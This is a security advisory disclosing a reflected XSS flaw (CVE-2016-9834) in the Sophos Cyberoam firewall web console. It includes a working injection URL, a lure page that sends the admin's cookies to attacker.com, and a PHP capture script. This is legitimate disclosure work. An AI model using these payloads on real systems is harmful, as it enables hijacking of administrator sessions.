Sophos Cyberoam Cross Site Scripting

2017.06.07
Credit: Bhadresh
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: ==== Sophos Cyberoam Cross-site scripting (XSS) vulnerability Credit: ====== Name: Bhadresh Patel Date: ==== 25/05/2017 (dd/mm/yyyy) Vendor: ====== More than 100 million users in 150 countries rely on Sophos to offer end-to-end protection against complex threats and data loss. Sophos is committed to providing complete, enterprise-grade security solutions that are simple to deploy, manage and use, and deliver one of the industry's lowest total cost of ownership. Sophos offers award-winning security solutions covering endpoint, mobile, server, encryption, web, email, Wi-Fi, and UTM/next-generation firewall, all backed by SophosLabs -- a global threat analysis center which provides real-time cloud-enabled security intelligence. Sophos is headquartered in Oxford, UK. Vulnerable Product: ============== Sophos Cyberoam Firewall Cyberoam Next-Generation Firewalls are based on CyberoamOS an intelligent and powerful firmware that offers next-generation security features include inline application inspection and control, website filtering, HTTPS inspection, Intrusion Prevention System, VPN (IPSec and SSL) and QoS/bandwidth management. Additional security features like Web Application Firewall, Gateway Anti-Virus, Gateway Anti-Spam are also available. Customer Product link: https://www.cyberoam.com Abstract: ======= Cross-site scripting (XSS) vulnerability in Sophos Cyberoam firewall enables and attackers to execute scripts in a victims browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the users browser using malware, etc. Affected Software Version: ============= <= Firmware Version 10.6.4 Vendor Response ============= Sophos is committed to working with the security community in identifying, remediating and communicating security issues in our products. Customers are advised to upgrade their Cyberoam OS to v.10.6.5, which addresses this issue. Exploitation-Technique: =================== Remote Severity Rating (CVSS): =================== 6.9 (Medium) (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N) CVE ID: ======= CVE-2016-9834 Details: ======= This vulnerability allows remote attackers to execute arbitrary client side script in the active users browser session, when logged into the Cyberoam firewall. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of request to LiveConnectionDetail.jsp application. GET parameters applicationname and username are improperly sanitized allowing an attacker to inject arbitrary javascript into the page. This can be abused by an attacker to perform a cross-site scripting attack on the user. Vulnerable module/page/application: /corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp Vulnerable parameters: applicationname and username PoC ======= http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449";alert(document.cookie)//181&username=NA PoC Video ========= https://www.youtube.com/watch?v=NmLPL2TYPcg Real world scenario 1) Victim (Admin) login to the Sophos Cyberoam web console 2) Sophos Cyberoam FW is on a latest version 3) record.txt is empty on attacker page 4) Victim (Admin) visits attacker URL/page http://www.attacker.com/promo.html 5) XSS successful and attacker captured cookie in record.txt -------------------------- Source code (promo.html) ---------------------------------- <html> <head> <script> window.location="http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449\";document.location='http://www.attacker.com/capture.php?content='.concat(escape(document.cookie));//181&username=NA" </script> </body> </html> -------------------------- Source code (capture.php) ---------------------------------- <?php file_put_contents('record.txt', $_GET['content']); echo "<HTML><body><script>window.location=\"http://192.168.30.30/corporate/webpages/index.jsp\"</script></body></HTML>" ?> Credits: ======= Bhadresh Patel


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top